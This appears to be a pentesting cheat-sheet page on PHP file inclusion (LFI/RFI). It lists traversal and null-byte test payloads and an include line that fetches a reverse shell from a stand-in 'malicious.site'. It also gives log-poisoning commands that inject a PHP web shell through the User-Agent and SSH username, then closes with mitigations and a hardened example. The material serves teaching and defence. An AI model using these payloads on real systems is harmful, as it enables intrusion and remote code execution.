File inclusion


File inclusion refers to websites that import a file based on user input. This involves using the user input to:

  • 🐚 determine configuration files to include
  • 🌍 determine language files to include
  • ...

If the input is not filtered/validated, an attacker may include arbitrary content, such as an uploaded script, using Path traversal.

There are two categories of file inclusion:

  • Local File Inclusion (LFI) 🏠: include a local file
  • Remote File Inclusion (RFI) ✈️: include a remote file

Template engines are more likely to contain LFI/RFI. These vulnerabilities can lead to code/data exposure, which may further compromise the company.

⚠️ For RFI, first try a local URL that is unlikely to be blocked by a firewall (ex: http://127.0.0.1:80/index.php). Alternatively, you may try ftp:// or \\IP\share\ on Windows.


Basic Methodology

Assuming you found some vectors that might lead to an LFI, such as:

  • 📚 Headers
  • 📄 Forms
  • 🍪 Cookies
  • ...

You can then play around with the value to see whether it is vulnerable.

Assuming the parameter is page=about:

  • Test a path: ./about
  • Test a null byte: ./about.php%00
  • Test a traversal path: ../<folder name>/about
  • Test architecture-specific payloads, such as php://filter
  • Test Remote Inclusion
  • ...

PHP File Inclusion


The website http://vulnerable.site/?lang=FR includes a file using $_GET["lang"], as seen below.

include "lang/$_GET[lang].php";

We can use Path traversal or PHP wrappers to include a malicious file, such as one we uploaded using another attack.

Local File Inclusion (LFI) 🏠: inject a local file

// ex: we uploaded a reverse shell (a fake PNG)
// as our avatar (avatar.png), then we could use:
include "lang/../uploads/avatar.png";
include "phar://<refer to php wrappers>";

Remote File Inclusion (RFI) ✈️: inject a remote file

// 🛑 allow_url_fopen MUST BE SET TO true (and, for include/require, allow_url_include as well)
include "http://malicious.site/reverse_shell.php";
include "data://<refer to php wrappers>";

Additional notes

  • The null byte %00 could be used in PHP < 5.3.4 to ignore a trailing extension, as in the example below where xxx.png is included:
include "xxx.png%00.php"; // includes xxx.png
  • PHP string truncation could be used in PHP < 5.3.0, as strings longer than 4096 characters were truncated.

  • If they are using assert() to filter characters such as .., we may be able to inject code into it.

  • Double URL encoding may allow us to bypass some filters (most likely not PHP filters) that do not fully decode the URL. By default, PHP decodes URLs once.


Log Poisoning

If the vulnerable function can execute code, we may not have to upload a webshell: we can inject PHP code into the logs, then read the logs to execute the injected code.

Note that the logs must be readable by the web application. Nginx logs are readable by anyone, but Apache logs are not.

# Ex: load /var/log/apache2/access.log / ...
$ curl [...] -A "<?php system(\$_GET['cmd']); ?>"

👉 /proc/self/environ or /proc/self/fd/<0-50> will contain the User-Agent too, but they may not be readable either.

We can alternatively poison ssh logs (username), ftp logs, etc.

$ ssh '<?php /*code*/ ?>'@IP # Ex: /var/log/auth.log

PHP Sessions

If the session contains a value that we control, we can inject PHP code into this value, then read (include) the session file.

  • /var/lib/php/sessions/sess_<session id>
  • C:\Windows\Temp\sess_<session id>

File Inclusion Mitigation 🛡️

  • 🪲 Do not use user-controlled input to include a file, whether the input comes from the database or from a form.

  • 🫧 Use whitelists (switch-case from value to file, maps, etc.), and avoid directly using user-controlled input.

  • 🕸️ If paths must be allowed, refer to the path traversal mitigations.

  • 🔒 Use Docker or a similar technology to isolate the application, OR lock the web application to its web root directory. In PHP, the open_basedir directive can be set in php.ini. Beware that configuration files will still be accessible.

  • 🔫 Add further checks, such as applying realpath() to the path to ensure the files are within the allowed directories.

  • 📚 Use additional tools such as a WAF, etc.
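As an added example (not from the original page), here is a hardened replacement for the vulnerable `include "lang/$_GET[lang].php";` above, combining the whitelist and realpath() mitigations from the list. The lang/ directory name and the EN/FR file names are assumptions.

```php
<?php
// Added example: hardened version of `include "lang/$_GET[lang].php";`.
// Two independent controls: (1) an allowlist map, so user input selects a
// key and never a path fragment; (2) a realpath() containment check, so
// even a mistake in the map cannot escape LANG_DIR.
// The directory and file names below are assumptions for this example.

declare(strict_types=1);

const LANG_DIR = __DIR__ . '/lang';

// (1) Allowlist: any key not listed here ("../x", "php://filter", "%00", ...)
//     simply does not resolve to a file.
const LANG_FILES = [
    'EN' => 'en.php',
    'FR' => 'fr.php',
];

function resolveLangFile(string $lang): ?string
{
    if (!isset(LANG_FILES[$lang])) {
        return null;
    }
    $candidate = LANG_DIR . '/' . LANG_FILES[$lang];

    // (2) Defence in depth: realpath() resolves symlinks and ".." segments.
    //     The resolved file must still live under the resolved base directory;
    //     comparing with a trailing separator avoids matching "lang_evil/".
    $base = realpath(LANG_DIR);
    $real = realpath($candidate);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

$lang = (isset($_GET['lang']) && is_string($_GET['lang'])) ? $_GET['lang'] : 'EN';
$file = resolveLangFile($lang);
if ($file === null) {
    http_response_code(400);
    exit('Unsupported language');
}
include $file;
```

Pairing this with open_basedir in php.ini and allow_url_include=Off closes the RFI side as well, since the include never receives a URL or wrapper scheme.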


👻 To-do 👻

Stuff that I found but have never read/used yet.

  • /var/log/sshd.log
  • /var/log/vsftpd.log